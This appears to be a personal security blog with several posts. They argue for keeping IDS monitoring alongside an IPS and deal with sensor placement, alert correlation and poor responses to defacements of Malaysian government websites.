Ayoi's

One of my colleagues from the technical support department asked me on the best emplacement of the internal sensor (IDS) if one network has IPS implemented as well. So I just give him a simple diagram to show him the usual emplacement of internal sensor when we have IPS implemented as well.

The reason why I would place my internal sensor (in this case DMZ sensor) behind IPS because:

a). I always believe that all the preventive measures will be defeated sooner or later. And if the DMZ sensor emplace in front of IPS, then what kind of indication we can have if the attack bypassed the IPS?

b). IF the sensor emplaced in front of the IPS, how do we know that one particular attack has been blocked or not by IPS?

Usually for this kind of emplacement, a good correlation between the alerts coming from the external IDS and internal IDS will help or assist analyst on determining whether the attack bypassed the preventive measures in form of firewalls and IPS. To enhance the identification process, both of the alerts will be compared against the logs retrieved from the targeted server.

As example let say the external sensor produce one alert stating that there is one remote file inclusion attempt on the web server. IF the internal sensor also produce the same alert, it means that this attempt successfully bypass the firewall (of cause) and the IPS as well. Only then the alert will be produced to the analyst console and IF only external sensor produce the alert, then it can be discarded or not presented to the analyst console. It may be used for statistical purpose perhaps.

Also another step will be if the external and internal sensor produce the same alert, then it will be compared against the web log obtained from the targeted web server. And if the response code for that attempt is 200 then these alerts will be produced to the analyst console, else those will be discarded.

BUT then my colleague said

“That’s what I’ve explained to them but their question is Why internal sensor generate too few alerts compared to the external sensor?”

I told him, “That means that their IPS has done a good job la !”

“Yeah, that’s what I thought so and I told them that but they still asking the same question.”

I’m out of words…

Does Monitoring still relevant if they going to implement IPS?

That’s one of the questions posed by my big Boss that really attract my attention to answer ( As usual my Big Boss always give a series of good topics  for our discussion which I really appreciate. It makes my brain working and somehow I do feel that I gained something valuables from these type of discussions even thought via emails)

So this is my reply

Interesting question tho. Of cause as one of the believers that Prevention Eventually Fails, I believe that the existence of IPS should never reduce the importance of detection. (Anyway before it can prevent, it has to detect first

Bejtlich says that Prevention Eventually fails because of the characteristics of the Intruders which are they are unpredictable and some of them are smarter than the defender.
Marcus Ranum says that Security is when people stops doing something stupid and from his thought “tell me what is so “deep” about knowing how to block 31 attacks ?” Even though that article is more on DPI capabilities in firewalls  but IMHO it is similar as perimeter security devices that incorporate IPS function.

And this is my thought;

Security is a process of reducing the risk to the acceptable level. This risk reduced by fulfilling the security process which is Assessment, protection, detection and response. Not long ago Organizations used to say that their network is secure when they have firewalls installed, and then when people realized that Firewalls only dealing with layer 2,3 and 4, IDS was introduced as an early warning detection system. And some smart guys think “if we can detect, why not we prevent the attacks as well?” Hence IPS was introduced in the market. IPS is more like giving those perimeter security devices views on what is happening above layer 5. And of cause, IPS like its predecessor IDS relies most of its detection/prevention mechanism on known attacks Signature based rules. Whether the signature is capturing the exploit or vulnerability is another issue.

Totally depending on this perimeter security devices (IPS/Firewalls/Proxy etc) is not a wise idea. Why? How can you prevent any attacks from unpredictable and smarter attackers? How to prevent any attacks that targeted to non-published attacks vector and vulnerabilities?

OK I can hear that some of you arguing that in case of 0-dayz attacks, event IDS will failed to produce alerts. Now lets discuss a lil bit about Detection,

For Detection process, it consists of Collection, Identification, Validation and Escalation. Let me point on Collection process. There are reasons why of having alert data, session data,  statistical data and full content data is the most ideal way of collecting network based information to assist analyst in Identification process. Anyway we also must aware that  Collecting  everything is Ideal but problematic  BUT to quote from  Taosecurity

“The advantage of collecting as much data as possible is the creation of options. Collecting full content data gives the ultimate set of options, like replaying traffic through an enhanced IDS signature set to discover previously overlooked incidents. Rich data collections provide material for testing people, policies, and products. Network-based data may provide the evidence to put a criminal behind bars.”

and

“NSM’s answer to the data collection issue is to not rely on a single tool to detect and escalate intrusions. While a protocol analyzer like Ethereal is well suited to interpret a dozen individual packets, it’s not the best tool to understand millions of packets. Turning to session data or statistics on the sorts of ports and addresses is a better way to identify suspicious activity.”

Lets imagine 3 scenario

Without IDS
An attacker attacks using 0-dayz exploits exploiting 0-dayz vulnerabilities on a workstation. Bypassed the firewalls, and the attack patterns didn’t match any rules in IPS and no blocking actions. The victim complaints and all we can do is patch and proceed. But we never know what actually happens.

With IDS without proper Collection Process
An attacker attacks using 0-dayz exploits exploiting 0-dayz vulnerabilities on a workstation. Bypassed the firewalls, the attack patterns didn’t match any rules in IPS so no blocking actions, the attack patterns didn’t match any rules in IDS and no alerts triggered. The victim complaints and all we can do is patch and proceed. But we never know what actually happens.

With IDS with proper Collection Process
An attacker attacks using 0-dayz exploits exploiting 0-dayz vulnerabilities on a workstation. Bypassed the firewalls, the attack patterns didn’t match any rules in IPS so no blocking actions and the attack patterns didn’t match any rules in IDS and no alerts triggered. The victim complaints and we can start investigate with the available data. Update the signatures and perhaps feed it to IPS and IDS plus the  information gathered can be used for  legal purposes

Detection Engine perhaps the main component in IDS. Its alerts will be the main indicators of suspicious events either occurred (compromised),  ongoing (exploitation), or will happen (vulnerability scanning) depending on the phases of compromise. For an analyst to perform his Identification process ( whether to categorize the suspicious event into normal or malicious) he needs all available resources or information to help his analysis. The main problem with IDS is the rate of false positives. The only ways to reduce it is by fine tuning our rules to suit our client environment and of cause we require our client inventory lists covering the assets that we monitor. It is easy to defend or monitor something that you know and aware.

I never say that we should abandon IPS nor any preventive measures. Like what I’ve stated before that Security is about reducing the risk of being compromised, we have to incorporate all security measures that perhaps may deter any potential intruders or attackers from launching or continue with his attacks. I dun believe in depending on one security product or only one security measure as for anyone who believe that his network is secured because having such and such products implemented in his network, he only manage his security based on belief and not by facts which in the end will fail spectacularly.

And of cause, Why a building that has biometric enabled access doors, access cards and security guards still needs CCTV?

Quite long eh? Anyway I would be grateful if any of you guys have any other opinions on this matter.

p/s: I’ve censored any sensitive/confidential statement tho

One of my favourite sites nowadays is http://security.org.my where recently it published a series of defacement occurred on the .gov related sites reported by users. And surprisingly there are few websites that been re-defaced from time to time and sadly the response from the affected party is either little or non-existence.

There’s one commenter of the defaced posting said that

” I think the country still can survive even if Majlis Daerah Kinta Barat or Majlis Perbandaran Manjung got defaced”

I do agree with the statement. Yes, the country will survive with this kind of attacks occurred on our government related sites but then let me point out few things tho.

For me, defacement is an attack that will leave trace like a blinking neon light in the middle of the desert at night. Because we can determine the final intention of the attacker in executing his attacks. Easier to trace as most of the attacks are more on the web applications flaws and vulnerability which most of the time will be logged either by the web logs or by the IDS. And of cause, obviously you will know that the defaced web sites has been compromised. Ahh and most of the time the attacker consists of either script kiddies who stumbled upon few scripts or a beginner in this web attacks. I think just like when you use nikto/nessus to launch your web vuln scanning etc, as it DOES produce a huge amount of alerts for snort at least.

But again, I do wonder why the response either too slow or non-existence at all and for the case of re-defacement, is the administrator has taken any necessary action to prevent such incident? Most of the time the action will be the restoration of the web page(s). But do they identify why the defacement occurred on their sites? Did they perform their own assessment on their assets applications and platform? Did they perform their patch management accordingly? I guess there are many questions need to be answered by them.

My concern is not the defacement issues but more on the response. If they failed to react or giving response accordingly to these annoying(my view) attacks then let me give one scenario where it should put enuff ph34r in those administrator heart.

Imagine if there’s one attacker who has the knowledge, the skills, the tools and the motivation to launch his attack where he adhere the maxim of intrusion “minimize signal, maximize access and maximize damage”. His exploits are custom made tools where he identified unpublished vulnerability exists on the victim web application (0-dayz). His attacks traffic are well crafted to appear as normal traffics in the network and of cause for these 0-dayz attacks, they will bypass the firewalls, IPS and even managed to avoid the IDS alerts from triggered. Or worst, he will create an encrypted channel to enable him to communicate with the compromised machine on appeared normal ports. His final intention? To steal data.

IF our .gov related administrators failed to respond appropriately on web defacement attacks, just imagine what kind of respond that they will give with the attack that I’ve mentioned above. I can bet the respond is none

Am I concern? No I am not concern.. I am freaking worry.